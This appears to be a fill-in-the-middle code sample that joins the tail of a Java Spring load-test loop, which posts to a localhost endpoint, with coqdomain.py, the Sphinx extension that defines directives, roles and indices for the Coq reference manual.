new org.springframework.boot.test.web.client.TestRestTemplate().postForObject(funcUrl, httpEntity, String.class);
sw.stop();
if (sw.getTotalTimeMillis() > 500) {
log.error(sw.prettyPrint());
} else if (log.isDebugEnabled()) {
log.debug(sw.prettyPrint());
}
log.debug("pressured:" + (i + 1));
}
}
}<|fim▁end|> | @Value("http://localhost:${server.port:8765}${server.servlet.context-path:}/vx/usercenter/userDepartment/d0002.json")
private String funcUrl;
|
<|file_name|>coqdomain.py<|end_file_name|><|fim▁begin|>##########################################################################
## # The Coq Proof Assistant / The Coq Development Team ##
## v # Copyright INRIA, CNRS and contributors ##
## <O___,, # (see version control and CREDITS file for authors & dates) ##
## \VV/ ###############################################################
## // # This file is distributed under the terms of the ##
## # GNU Lesser General Public License Version 2.1 ##
## # (see LICENSE file for the text of the license) ##
##########################################################################
"""A Coq domain for Sphinx.
Currently geared towards Coq's manual, rather than Coq source files, but one
could imagine extending it.
"""
# pylint: disable=missing-type-doc, missing-param-doc
# pylint: disable=missing-return-type-doc, missing-return-doc
# pylint: disable=too-few-public-methods, too-many-ancestors, arguments-differ
# pylint: disable=import-outside-toplevel, abstract-method, too-many-lines
import os
import re
from itertools import chain
from collections import defaultdict
from docutils import nodes, utils
from docutils.transforms import Transform
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.roles import code_role #, set_classes
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from sphinx import addnodes
from sphinx.directives import ObjectDescription
from sphinx.domains import Domain, ObjType, Index
from sphinx.errors import ExtensionError
from sphinx.roles import XRefRole
from sphinx.util.docutils import ReferenceRole
from sphinx.util.logging import getLogger, get_node_location
from sphinx.util.nodes import set_source_info, set_role_source_info, make_refnode
from sphinx.writers.latex import LaTeXTranslator
from . import coqdoc
from .repl import ansicolors
from .repl.coqtop import CoqTop, CoqTopError
from .notations.parsing import ParseError
from .notations.sphinx import sphinxify
from .notations.plain import stringify_with_ellipses
# FIXME: Patch this in Sphinx
# https://github.com/coq/coq/issues/12361
def visit_desc_signature(self, node):
hyper = ''
if node.parent['objtype'] != 'describe' and node['ids']:
for id in node['ids']:
hyper += self.hypertarget(id)
self.body.append(hyper)
if not node.get('is_multiline'):
self._visit_signature_line(node)
else:
self.body.append('%\n\\pysigstartmultiline\n')
LaTeXTranslator.visit_desc_signature = visit_desc_signature
PARSE_ERROR = """{}:{} Parse error in notation!
Offending notation: {}
Error message: {}"""
def notation_to_sphinx(notation, source, line, rawtext=None):
"""Parse notation and wrap it in an inline node"""
try:
node = nodes.inline(rawtext or notation, '', *sphinxify(notation), classes=['notation'])
node.source, node.line = source, line
return node
except ParseError as e:
raise ExtensionError(PARSE_ERROR.format(os.path.basename(source), line, notation, e.msg)) from e
def notation_to_string(notation):
"""Parse notation and format it as a string with ellipses."""
try:
return stringify_with_ellipses(notation)
except ParseError as e:
# FIXME source and line aren't defined below — see cc93f419e0
raise ExtensionError(PARSE_ERROR.format(os.path.basename(source), line, notation, e.msg)) from e
def highlight_using_coqdoc(sentence):
"""Lex sentence using coqdoc, and yield inline nodes for each token"""
tokens = coqdoc.lex(utils.unescape(sentence, 1))
for classes, value in tokens:
yield nodes.inline(value, value, classes=classes)
def make_target(objtype, targetid):
"""Create a target to an object of type objtype and id targetid"""
return "coq:{}.{}".format(objtype, targetid)
def make_math_node(latex, docname, nowrap):
node = nodes.math_block(latex, latex)
node['label'] = None # Otherwise equations are numbered
node['nowrap'] = nowrap
node['docname'] = docname
node['number'] = None
return node
class CoqObject(ObjectDescription):
"""A generic Coq object for Sphinx; all Coq objects are subclasses of this.
The fields and methods to override are listed at the top of this class'
implementation. Each object supports the :name: option, which gives an
explicit name to link to.
See the comments and docstrings in CoqObject for more information.
"""
# The semantic domain in which this object lives (eg. “tac”, “cmd”, “chm”…).
# It matches exactly one of the roles used for cross-referencing.
subdomain = None # type: str
# The suffix to use in indices for objects of this type (eg. “(tac)”)
index_suffix = None # type: str
# The annotation to add to headers of objects of this type
# (eg. “Command”, “Theorem”)
annotation = None # type: str
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._sig_names = None
def _name_from_signature(self, signature): # pylint: disable=no-self-use, unused-argument
"""Convert a signature into a name to link to.
‘Signature’ is Sphinx parlance for an object's header (think “type
signature”); for example, the signature of the simplest form of the
``exact`` tactic is ``exact @id``.
Generates a name for the directive. Override this method to return None
to avoid generating a name automatically. This is a convenient way
to automatically generate names (link targets) without having to write
explicit names everywhere.
"""
m = re.match(r"[a-zA-Z0-9_ ]+", signature)
if m:
return m.group(0).strip()
def _render_signature(self, signature, signode):
"""Render a signature, placing resulting nodes into signode."""
raise NotImplementedError(self)
option_spec = {
# Explicit object naming
'name': directives.unchanged,
# Silence warnings produced by report_undocumented_coq_objects
'undocumented': directives.flag,
# noindex omits this object from its index
'noindex': directives.flag
}
def subdomain_data(self):
if self.subdomain is None:
raise ValueError()
return self.env.domaindata['coq']['objects'][self.subdomain]
def _render_annotation(self, signode):
if self.annotation:
annot_node = nodes.inline(self.annotation, self.annotation, classes=['sigannot'])
signode += addnodes.desc_annotation(self.annotation, '', annot_node)
signode += nodes.Text(' ')
def handle_signature(self, signature, signode):
"""Prefix signature with the proper annotation, then render it using
``_render_signature`` (for example, add “Command” in front of commands).
:returns: the names given to the resulting node.
"""
self._render_annotation(signode)
self._render_signature(signature, signode)
names = self._sig_names.get(signature)
if names is None:
name = self._name_from_signature(signature) # pylint: disable=assignment-from-none
# remove trailing ‘.’ found in commands, but not ‘...’ (ellipsis)
if name is not None and name.endswith(".") and not name.endswith("..."):
name = name[:-1]
names = [name] if name else None
return names
def _warn_if_duplicate_name(self, objects, name, signode):
"""Check that two objects in the same domain don't have the same name."""
if name in objects:
MSG = 'Duplicate name {} (other is in {}) attached to {}'
msg = MSG.format(name, self.env.doc2path(objects[name][0]), signode)
self.state_machine.reporter.warning(msg, line=self.lineno)
def _record_name(self, name, target_id, signode):
"""Record a `name` in the current subdomain, mapping it to `target_id`.
Warns if another object of the same name already exists; `signode` is
used in the warning.
"""
names_in_subdomain = self.subdomain_data()
self._warn_if_duplicate_name(names_in_subdomain, name, signode)
names_in_subdomain[name] = (self.env.docname, self.objtype, target_id)
def _target_id(self, name):
return make_target(self.objtype, nodes.make_id(name))
def _add_target(self, signode, name):
"""Register a link target ‘name’, pointing to signode."""
targetid = self._target_id(name)
if targetid not in self.state.document.ids:
signode['ids'].append(targetid)
signode['names'].append(name)
signode['first'] = (not self.names)
self._record_name(name, targetid, signode)
return targetid
def _add_index_entry(self, name, target):
"""Add `name` (pointing to `target`) to the main index."""
assert isinstance(name, str)
# remove trailing . , found in commands, but not ... (ellipsis)
trim = name.endswith(".") and not name.endswith("...")
index_text = name[:-1] if trim else name
if self.index_suffix:
index_text += " " + self.index_suffix
self.indexnode['entries'].append(('single', index_text, target, '', None))
def add_target_and_index(self, names, _, signode):
"""Attach a link target to `signode` and index entries for `names`.
This is only called (from ``ObjectDescription.run``) if ``:noindex:`` isn't specified."""
if names:
for name in names:
if isinstance(name, str) and name.startswith('_'):
continue
target = self._add_target(signode, name)
self._add_index_entry(name, target)
self.state.document.note_explicit_target(signode)
def _prepare_names(self):
"""Construct ``self._sig_names``, a map from signatures to names.
A node may have either one signature with no name, multiple signatures
with one name per signatures, or one signature with multiple names.
"""
sigs = self.get_signatures()
names = self.options.get("name")
if names is None:
self._sig_names = {}
else:
names = [n.strip() for n in names.split(";")]
if len(names) != len(sigs):
if len(sigs) != 1: #Multiple names for one signature
ERR = ("Expected {} semicolon-separated names, got {}. " +
"Please provide one name per signature line.")
raise self.error(ERR.format(len(names), len(sigs)))
self._sig_names = { sigs[0]: names }
else:
self._sig_names = { sig: [name] for (sig, name) in zip(sigs, names) }
def run(self):
self._prepare_names()
return super().run()
class DocumentableObject(CoqObject):
def _warn_if_undocumented(self):
document = self.state.document
config = document.settings.env.config
report = config.report_undocumented_coq_objects
if report and not self.content and "undocumented" not in self.options:
# This is annoyingly convoluted, but we don't want to raise warnings
# or interrupt the generation of the current node. For more details
# see https://github.com/sphinx-doc/sphinx/issues/4976.
msg = 'No contents in directive {}'.format(self.name)
node = document.reporter.info(msg, line=self.lineno)
getLogger(__name__).info(node.astext())
if report == "warning":
raise self.warning(msg)
def run(self):
self._warn_if_undocumented()
return super().run()
class PlainObject(DocumentableObject):
"""A base class for objects whose signatures should be rendered literally."""
def _render_signature(self, signature, signode):
signode += addnodes.desc_name(signature, signature)
class NotationObject(DocumentableObject):
"""A base class for objects whose signatures should be rendered as nested boxes.
Objects that inherit from this class can use the notation grammar (“{+ …}”,
“@…”, etc.) in their signature.
"""
def _render_signature(self, signature, signode):
position = self.state_machine.get_source_and_line(self.lineno)
tacn_node = notation_to_sphinx(signature, *position)
signode += addnodes.desc_name(signature, '', tacn_node)
class GallinaObject(PlainObject):
r"""A theorem.
Example::
.. thm:: Bound on the ceiling function
Let :math:`p` be an integer and :math:`c` a rational constant. Then
:math:`p \ge c \rightarrow p \ge \lceil{c}\rceil`.
"""
subdomain = "thm"
index_suffix = "(theorem)"
annotation = "Theorem"
class VernacObject(NotationObject):
"""A Coq command.
Example::
.. cmd:: Infix @string := @one_term {? ( {+, @syntax_modifier } ) } {? : @ident }
This command is equivalent to :n:`…`.
"""
subdomain = "cmd"
index_suffix = "(command)"
annotation = "Command"
def _name_from_signature(self, signature):
m = re.match(r"[a-zA-Z ]+", signature)
return m.group(0).strip() if m else None
class VernacVariantObject(VernacObject):
"""A variant of a Coq command.
Example::
.. cmd:: Axiom @ident : @term.
This command links :token:`term` to the name :token:`term` as its specification in
the global context. The fact asserted by :token:`term` is thus assumed as a
postulate.
.. cmdv:: Parameter @ident : @term.
This is equivalent to :n:`Axiom @ident : @term`.
"""
index_suffix = "(command variant)"
annotation = "Variant"
def _name_from_signature(self, signature):
return None
class TacticObject(NotationObject):
"""A tactic, or a tactic notation.
Example::
.. tacn:: do @natural @expr
:token:`expr` is evaluated to ``v`` which must be a tactic value. …
"""
subdomain = "tacn"
index_suffix = "(tactic)"
annotation = "Tactic"
class AttributeObject(NotationObject):
"""An attribute.
Example::
.. attr:: local
"""
subdomain = "attr"
index_suffix = "(attribute)"
annotation = "Attribute"
def _name_from_signature(self, signature):
return notation_to_string(signature)
class TacticVariantObject(TacticObject):
"""A variant of a tactic.
Example::
.. tacn:: fail
This is the always-failing tactic: it does not solve any goal. It is
useful for defining other tacticals since it can be caught by
:tacn:`try`, :tacn:`repeat`, :tacn:`match goal`, or the branching
tacticals. …
.. tacv:: fail @natural
The number is the failure level. If no level is specified, it
defaults to 0. …
"""
index_suffix = "(tactic variant)"
annotation = "Variant"
def _name_from_signature(self, signature):
return None
class OptionObject(NotationObject):
"""A Coq option (a setting with non-boolean value, e.g. a string or numeric value).
Example::
.. opt:: Hyps Limit @natural
:name Hyps Limit
Controls the maximum number of hypotheses displayed in goals after
application of a tactic.
"""
subdomain = "opt"
index_suffix = "(option)"
annotation = "Option"
class FlagObject(NotationObject):<|fim▁hole|> """A Coq flag (i.e. a boolean setting).
Example::
.. flag:: Nonrecursive Elimination Schemes
Controls whether types declared with the keywords
:cmd:`Variant` and :cmd:`Record` get an automatic declaration of
induction principles.
"""
subdomain = "flag"
index_suffix = "(flag)"
annotation = "Flag"
class TableObject(NotationObject):
"""A Coq table, i.e. a setting that is a set of values.
Example::
.. table:: Search Blacklist @string
:name: Search Blacklist
Controls ...
"""
subdomain = "table"
index_suffix = "(table)"
annotation = "Table"
class ProductionObject(CoqObject):
r"""A grammar production.
Use ``.. prodn`` to document grammar productions instead of Sphinx
`production lists
<http://www.sphinx-doc.org/en/stable/markup/para.html#directive-productionlist>`_.
prodn displays multiple productions together with alignment similar to ``.. productionlist``,
however unlike ``.. productionlist``\ s, this directive accepts notation syntax.
Example::
.. prodn:: occ_switch ::= { {? {| + | - } } {* @natural } }
term += let: @pattern := @term in @term
| second_production
The first line defines "occ_switch", which must be unique in the document. The second
references and expands the definition of "term", whose main definition is elsewhere
in the document. The third form is for continuing the
definition of a nonterminal when it has multiple productions. It leaves the first
column in the output blank.
"""
subdomain = "prodn"
#annotation = "Grammar production"
# handle_signature is called for each line of input in the prodn::
# 'signatures' accumulates them in order to combine the lines into a single table:
signatures = None # FIXME this should be in init, shouldn't it?
def _render_signature(self, signature, signode):
raise NotImplementedError(self)
SIG_ERROR = ("{}: Invalid syntax in ``.. prodn::`` directive"
+ "\nExpected ``name ::= ...`` or ``name += ...``"
+ " (e.g. ``pattern += constr:(@ident)``)\n"
+ " in `{}`")
def handle_signature(self, signature, signode):
parts = signature.split(maxsplit=1)
if parts[0].strip() == "|" and len(parts) == 2:
lhs = ""
op = "|"
rhs = parts[1].strip()
else:
parts = signature.split(maxsplit=2)
if len(parts) != 3:
loc = os.path.basename(get_node_location(signode))
raise ExtensionError(ProductionObject.SIG_ERROR.format(loc, signature))
lhs, op, rhs = (part.strip() for part in parts)
if op not in ["::=", "+="]:
loc = os.path.basename(get_node_location(signode))
raise ExtensionError(ProductionObject.SIG_ERROR.format(loc, signature))
parts = rhs.split(" ", maxsplit=1)
rhs = parts[0].strip()
tag = parts[1].strip() if len(parts) == 2 else ""
self.signatures.append((lhs, op, rhs, tag))
return [('token', lhs)] if op == '::=' else None
def _add_index_entry(self, name, target):
pass
def _target_id(self, name):
return 'grammar-token-{}'.format(nodes.make_id(name[1]))
def _record_name(self, name, targetid, signode):
env = self.state.document.settings.env
objects = env.domaindata['std']['objects']
self._warn_if_duplicate_name(objects, name, signode)
objects[name] = env.docname, targetid
def run(self):
self.signatures = []
indexnode = super().run()[0] # makes calls to handle_signature
table = nodes.container(classes=['prodn-table'])
tgroup = nodes.container(classes=['prodn-column-group'])
for _ in range(4):
tgroup += nodes.container(classes=['prodn-column'])
table += tgroup
tbody = nodes.container(classes=['prodn-row-group'])
table += tbody
# create rows
for signature in self.signatures:
lhs, op, rhs, tag = signature
position = self.state_machine.get_source_and_line(self.lineno)
row = nodes.container(classes=['prodn-row'])
entry = nodes.container(classes=['prodn-cell-nonterminal'])
if lhs != "":
target_name = 'grammar-token-' + nodes.make_id(lhs)
target = nodes.target('', '', ids=[target_name], names=[target_name])
# putting prodn-target on the target node won't appear in the tex file
inline = nodes.inline(classes=['prodn-target'])
inline += target
entry += inline
entry += notation_to_sphinx('@'+lhs, *position)
else:
entry += nodes.Text('')
row += entry
entry = nodes.container(classes=['prodn-cell-op'])
entry += nodes.Text(op)
row += entry
entry = nodes.container(classes=['prodn-cell-production'])
entry += notation_to_sphinx(rhs, *position)
row += entry
entry = nodes.container(classes=['prodn-cell-tag'])
entry += nodes.Text(tag)
row += entry
tbody += row
return [indexnode, table] # only this node goes into the doc
class ExceptionObject(NotationObject):
"""An error raised by a Coq command or tactic.
This commonly appears nested in the ``.. tacn::`` that raises the
exception.
Example::
.. tacv:: assert @form by @tactic
This tactic applies :n:`@tactic` to solve the subgoals generated by
``assert``.
.. exn:: Proof is not complete
Raised if :n:`@tactic` does not fully solve the goal.
"""
subdomain = "exn"
index_suffix = "(error)"
annotation = "Error"
# Uses “exn” since “err” already is a CSS class added by “writer_aux”.
# Generate names automatically
def _name_from_signature(self, signature):
return notation_to_string(signature)
class WarningObject(NotationObject):
"""An warning raised by a Coq command or tactic..
Do not mistake this for ``.. warning::``; this directive is for warning
messages produced by Coq.
Example::
.. warn:: Ambiguous path
When the coercion :token:`qualid` is added to the inheritance graph, non
valid coercion paths are ignored.
"""
subdomain = "warn"
index_suffix = "(warning)"
annotation = "Warning"
# Generate names automatically
def _name_from_signature(self, signature):
return notation_to_string(signature)
def NotationRole(role, rawtext, text, lineno, inliner, options={}, content=[]):
#pylint: disable=unused-argument, dangerous-default-value
"""Any text using the notation syntax (``@id``, ``{+, …}``, etc.).
Use this to explain tactic equivalences. For example, you might write
this::
:n:`generalize @term as @ident` is just like :n:`generalize @term`, but
it names the introduced hypothesis :token:`ident`.
Note that this example also uses ``:token:``. That's because ``ident`` is
defined in the Coq manual as a grammar production, and ``:token:``
creates a link to that. When referring to a placeholder that happens to be
a grammar production, ``:token:`…``` is typically preferable to ``:n:`@…```.
"""
notation = utils.unescape(text, 1)
position = inliner.reporter.get_source_and_line(lineno)
return [nodes.literal(rawtext, '', notation_to_sphinx(notation, *position, rawtext=rawtext))], []
def coq_code_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
#pylint: disable=dangerous-default-value
"""Coq code.
Use this for Gallina and Ltac snippets::
:g:`apply plus_comm; reflexivity`
:g:`Set Printing All.`
:g:`forall (x: t), P(x)`
"""
options['language'] = 'Coq'
return code_role(role, rawtext, text, lineno, inliner, options, content)
## Too heavy:
## Forked from code_role to use our custom tokenizer; this doesn't work for
## snippets though: for example CoqDoc swallows the parentheses around this:
## “(a: A) (b: B)”
# set_classes(options)
# classes = ['code', 'coq']
# code = utils.unescape(text, 1)
# node = nodes.literal(rawtext, '', *highlight_using_coqdoc(code), classes=classes)
# return [node], []
CoqCodeRole = coq_code_role
class CoqtopDirective(Directive):
r"""A reST directive to describe interactions with Coqtop.
Usage::
.. coqtop:: options…
Coq code to send to coqtop
Example::
.. coqtop:: in reset
Print nat.
Definition a := 1.
The blank line after the directive is required. If you begin a proof,
use the ``abort`` option to reset coqtop for the next example.
Here is a list of permissible options:
- Display options (choose exactly one)
- ``all``: Display input and output
- ``in``: Display only input
- ``out``: Display only output
- ``none``: Display neither (useful for setup commands)
- Behavior options
- ``reset``: Send a ``Reset Initial`` command before running this block
- ``fail``: Don't die if a command fails, implies ``warn`` (so no need to put both)
- ``warn``: Don't die if a command emits a warning
- ``restart``: Send a ``Restart`` command before running this block (only works in proof mode)
- ``abort``: Send an ``Abort All`` command after running this block (leaves all pending proofs if any)
``coqtop``\ 's state is preserved across consecutive ``.. coqtop::`` blocks
of the same document (``coqrst`` creates a single ``coqtop`` process per
reST source file). Use the ``reset`` option to reset Coq's state.
"""
has_content = True
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = { 'name': directives.unchanged }
directive_name = "coqtop"
def run(self):
# Uses a ‘container’ instead of a ‘literal_block’ to disable
# Pygments-based post-processing (we could also set rawsource to '')
content = '\n'.join(self.content)
args = self.arguments[0].split()
node = nodes.container(content, coqtop_options = set(args),
classes=['coqtop', 'literal-block'])
self.add_name(node)
return [node]
class CoqdocDirective(Directive):
"""A reST directive to display Coqtop-formatted source code.
Usage::
.. coqdoc::
Coq code to highlight
Example::
.. coqdoc::
Definition test := 1.
"""
# TODO implement this as a Pygments highlighter?
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = True
option_spec = { 'name': directives.unchanged }
directive_name = "coqdoc"
def run(self):
# Uses a ‘container’ instead of a ‘literal_block’ to disable
# Pygments-based post-processing (we could also set rawsource to '')
content = '\n'.join(self.content)
node = nodes.inline(content, '', *highlight_using_coqdoc(content))
wrapper = nodes.container(content, node, classes=['coqdoc', 'literal-block'])
self.add_name(wrapper)
return [wrapper]
class ExampleDirective(BaseAdmonition):
"""A reST directive for examples.
This behaves like a generic admonition; see
http://docutils.sourceforge.net/docs/ref/rst/directives.html#generic-admonition
for more details.
Optionally, any text immediately following the ``.. example::`` header is
used as the example's title.
Example::
.. example:: Adding a hint to a database
The following adds ``plus_comm`` to the ``plu`` database:
.. coqdoc::
Hint Resolve plus_comm : plu.
"""
node_class = nodes.admonition
directive_name = "example"
optional_arguments = 1
def run(self):
# ‘BaseAdmonition’ checks whether ‘node_class’ is ‘nodes.admonition’,
# and uses arguments[0] as the title in that case (in other cases, the
# title is unset, and it is instead set in the HTML visitor).
assert len(self.arguments) <= 1
self.arguments = [": ".join(['Example'] + self.arguments)]
self.options['classes'] = ['admonition', 'note']
return super().run()
class PreambleDirective(Directive):
r"""A reST directive to include a TeX file.
Mostly useful to let MathJax know about `\def`\s and `\newcommand`\s. The
contents of the TeX file are wrapped in a math environment, as MathJax
doesn't process LaTeX definitions otherwise.
Usage::
.. preamble:: preamble.tex
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
directive_name = "preamble"
def run(self):
document = self.state.document
env = document.settings.env
if not document.settings.file_insertion_enabled:
msg = 'File insertion disabled'
return [document.reporter.warning(msg, line=self.lineno)]
rel_fname, abs_fname = env.relfn2path(self.arguments[0])
env.note_dependency(rel_fname)
with open(abs_fname, encoding="utf-8") as ltx:
latex = ltx.read()
node = make_math_node(latex, env.docname, nowrap=False)
node['classes'] = ["math-preamble"]
set_source_info(self, node)
return [node]
class InferenceDirective(Directive):
r"""A reST directive to format inference rules.
This also serves as a small illustration of the way to create new Sphinx
directives.
Usage::
.. inference:: name
newline-separated premises
--------------------------
conclusion
Example::
.. inference:: Prod-Pro
\WTEG{T}{s}
s \in \Sort
\WTE{\Gamma::(x:T)}{U}{\Prop}
-----------------------------
\WTEG{\forall~x:T,U}{\Prop}
"""
required_arguments = 1
optional_arguments = 0
has_content = True
final_argument_whitespace = True
directive_name = "inference"
@staticmethod
def prepare_latex_operand(op):
# TODO: Could use a fancier inference class in LaTeX
return '%\n\\hspace{3em}%\n'.join(op.strip().splitlines())
def prepare_latex(self, content):
parts = re.split('^ *----+ *$', content, flags=re.MULTILINE)
if len(parts) != 2:
raise self.error('Expected two parts in ‘inference’ directive, separated by a rule (----).')
top, bottom = tuple(InferenceDirective.prepare_latex_operand(p) for p in parts)
return "%\n".join(("\\frac{", top, "}{", bottom, "}"))
def run(self):
self.assert_has_content()
title = self.arguments[0]
content = '\n'.join(self.content)
latex = self.prepare_latex(content)
docname = self.state.document.settings.env.docname
math_node = make_math_node(latex, docname, nowrap=False)
tid = nodes.make_id(title)
target = nodes.target('', '', ids=['inference-' + tid])
self.state.document.note_explicit_target(target)
term, desc = nodes.term('', title), nodes.description('', math_node)
dli = nodes.definition_list_item('', term, desc)
dl = nodes.definition_list(content, target, dli)
set_source_info(self, dl)
return [dl]
class AnsiColorsParser():
"""Parse ANSI-colored output from Coqtop into Sphinx nodes."""
# Coqtop's output crashes ansi.py, because it contains a bunch of extended codes
# This class is a fork of the original ansi.py, released under a BSD license in sphinx-contribs
COLOR_PATTERN = re.compile('\x1b\\[([^m]+)m')
def __init__(self):
self.new_nodes, self.pending_nodes = [], []
def _finalize_pending_nodes(self):
self.new_nodes.extend(self.pending_nodes)
self.pending_nodes = []
def _add_text(self, raw, beg, end):
if beg < end:
text = raw[beg:end]
if self.pending_nodes:
self.pending_nodes[-1].append(nodes.Text(text))
else:
self.new_nodes.append(nodes.inline('', text))
def colorize_str(self, raw):
"""Parse raw (an ANSI-colored output string from Coqtop) into Sphinx nodes."""
last_end = 0
for match in AnsiColorsParser.COLOR_PATTERN.finditer(raw):
self._add_text(raw, last_end, match.start())
last_end = match.end()
classes = ansicolors.parse_ansi(match.group(1))
if 'ansi-reset' in classes:
self._finalize_pending_nodes()
else:
node = nodes.inline()
self.pending_nodes.append(node)
node['classes'].extend(classes)
self._add_text(raw, last_end, len(raw))
self._finalize_pending_nodes()
return self.new_nodes
class CoqtopBlocksTransform(Transform):
"""Filter handling the actual work for the coqtop directive
Adds coqtop's responses, colorizes input and output, and merges consecutive
coqtop directives for better visual rendition.
"""
default_priority = 10
@staticmethod
def is_coqtop_block(node):
return isinstance(node, nodes.Element) and 'coqtop_options' in node
@staticmethod
def split_lines(source):
r"""Split Coq input in chunks
A chunk is a minimal sequence of consecutive lines of the input that
ends with a '.'
>>> split_lines('A.\nB.''')
['A.', 'B.']
>>> split_lines('A.\n\nB.''')
['A.', '\nB.']
>>> split_lines('A.\n\nB.\n''')
['A.', '\nB.']
>>> split_lines("SearchPattern (_ + _ = _ + _).\n"
... "SearchPattern (nat -> bool).\n"
... "SearchPattern (forall l : list _, _ l l).")
... # doctest: +NORMALIZE_WHITESPACE
['SearchPattern (_ + _ = _ + _).',
'SearchPattern (nat -> bool).',
'SearchPattern (forall l : list _, _ l l).']
>>> split_lines('SearchHead le.\nSearchHead (@eq bool).')
['SearchHead le.', 'SearchHead (@eq bool).']
"""
return re.split(r"(?<=(?<!\.)\.)\n", source.strip())
@staticmethod
def parse_options(node):
"""Parse options according to the description in CoqtopDirective."""
options = node['coqtop_options']
# Behavior options
opt_reset = 'reset' in options
opt_fail = 'fail' in options
opt_warn = 'warn' in options
opt_restart = 'restart' in options
opt_abort = 'abort' in options
options = options - {'reset', 'fail', 'warn', 'restart', 'abort'}
unexpected_options = list(options - {'all', 'none', 'in', 'out'})
if unexpected_options:
loc = os.path.basename(get_node_location(node))
raise ExtensionError("{}: Unexpected options for .. coqtop:: {}".format(loc,unexpected_options))
# Display options
if len(options) != 1:
loc = os.path.basename(get_node_location(node))
raise ExtensionError("{}: Exactly one display option must be passed to .. coqtop::".format(loc))
opt_all = 'all' in options
opt_input = 'in' in options
opt_output = 'out' in options
return {
'reset': opt_reset,
'fail': opt_fail,
# if errors are allowed, then warnings too
# and they should be displayed as warnings, not errors
'warn': opt_warn or opt_fail,
'restart': opt_restart,
'abort': opt_abort,
'input': opt_input or opt_all,
'output': opt_output or opt_all
}
@staticmethod
def block_classes(should_show, contents=None):
"""Compute classes to add to a node containing contents.
:param should_show: Whether this node should be displayed"""
is_empty = contents is not None and re.match(r"^\s*$", contents)
return ['coqtop-hidden'] if is_empty or not should_show else []
@staticmethod
def make_rawsource(pairs, opt_input, opt_output):
blocks = []
for sentence, output in pairs:
output = AnsiColorsParser.COLOR_PATTERN.sub("", output).strip()
if opt_input:
blocks.append(sentence)
if output and opt_output:
blocks.append(re.sub("^", " ", output, flags=re.MULTILINE) + "\n")
return '\n'.join(blocks)
def add_coq_output_1(self, repl, node):
options = self.parse_options(node)
pairs = []
if options['restart']:
repl.sendone('Restart.')
if options['reset']:
repl.sendone('Reset Initial.')
repl.send_initial_options()
if options['fail']:
repl.sendone('Unset Coqtop Exit On Error.')
if options['warn']:
repl.sendone('Set Warnings "default".')
for sentence in self.split_lines(node.rawsource):
pairs.append((sentence, repl.sendone(sentence)))
if options['abort']:
repl.sendone('Abort All.')
if options['fail']:
repl.sendone('Set Coqtop Exit On Error.')
if options['warn']:
repl.sendone('Set Warnings "+default".')
dli = nodes.definition_list_item()
for sentence, output in pairs:
# Use Coqdoc to highlight input
in_chunks = highlight_using_coqdoc(sentence)
dli += nodes.term(sentence, '', *in_chunks, classes=self.block_classes(options['input']))
# Parse ANSI sequences to highlight output
out_chunks = AnsiColorsParser().colorize_str(output)
dli += nodes.definition(output, *out_chunks, classes=self.block_classes(options['output'], output))
node.clear()
node.rawsource = self.make_rawsource(pairs, options['input'], options['output'])
node['classes'].extend(self.block_classes(options['input'] or options['output']))
node += nodes.inline('', '', classes=['coqtop-reset'] * options['reset'])
node += nodes.definition_list(node.rawsource, dli)
def add_coqtop_output(self):
"""Add coqtop's responses to a Sphinx AST
Finds nodes to process using is_coqtop_block."""
with CoqTop(color=True) as repl:
repl.send_initial_options()
for node in self.document.traverse(CoqtopBlocksTransform.is_coqtop_block):
try:
self.add_coq_output_1(repl, node)
except CoqTopError as err:
import textwrap
MSG = ("{}: Error while sending the following to coqtop:\n{}" +
"\n coqtop output:\n{}" +
"\n Full error text:\n{}")
indent = " "
loc = get_node_location(node)
le = textwrap.indent(str(err.last_sentence), indent)
bef = textwrap.indent(str(err.before), indent)
fe = textwrap.indent(str(err.err), indent)
raise ExtensionError(MSG.format(loc, le, bef, fe))
@staticmethod
def merge_coqtop_classes(kept_node, discarded_node):
discarded_classes = discarded_node['classes']
if not 'coqtop-hidden' in discarded_classes:
kept_node['classes'] = [c for c in kept_node['classes']
if c != 'coqtop-hidden']
@staticmethod
def merge_consecutive_coqtop_blocks(_app, doctree, _):
"""Merge consecutive divs wrapping lists of Coq sentences; keep ‘dl’s separate."""
for node in doctree.traverse(CoqtopBlocksTransform.is_coqtop_block):
if node.parent:
rawsources, names = [node.rawsource], set(node['names'])
for sibling in node.traverse(include_self=False, descend=False,
siblings=True, ascend=False):
if CoqtopBlocksTransform.is_coqtop_block(sibling):
CoqtopBlocksTransform.merge_coqtop_classes(node, sibling)
rawsources.append(sibling.rawsource)
names.update(sibling['names'])
node.extend(sibling.children)
node.parent.remove(sibling)
sibling.parent = None
else:
break
node.rawsource = "\n\n".join(rawsources)
node['names'] = list(names)
def apply(self):
self.add_coqtop_output()
class CoqSubdomainsIndex(Index):
"""Index subclass to provide subdomain-specific indices.
Just as in the original manual, we want to have separate indices for each
Coq subdomain (tactics, commands, options, etc)"""
name, localname, shortname, subdomains = None, None, None, [] # Must be overwritten
def generate(self, docnames=None):
content = defaultdict(list)
items = chain(*(self.domain.data['objects'][subdomain].items()
for subdomain in self.subdomains))
for itemname, (docname, _, anchor) in sorted(items, key=lambda x: x[0].lower()):
if docnames and docname not in docnames:
continue
entries = content[itemname[0].lower()]
entries.append([itemname, 0, docname, anchor, '', '', ''])
collapse = False
content = sorted(content.items())
return content, collapse
class CoqVernacIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "cmdindex", "Command Index", "commands", ["cmd"]
class CoqTacticIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "tacindex", "Tactic Index", "tactics", ["tacn"]
class CoqAttributeIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "attrindex", "Attribute Index", "attributes", ["attr"]
class CoqOptionIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "optindex", "Flags, options and Tables Index", "options", ["flag", "opt", "table"]
class CoqGallinaIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "thmindex", "Gallina Index", "theorems", ["thm"]
class CoqExceptionIndex(CoqSubdomainsIndex):
name, localname, shortname, subdomains = "exnindex", "Errors and Warnings Index", "errors", ["exn", "warn"]
class IndexXRefRole(XRefRole):
"""A link to one of our domain-specific indices."""
lowercase = True
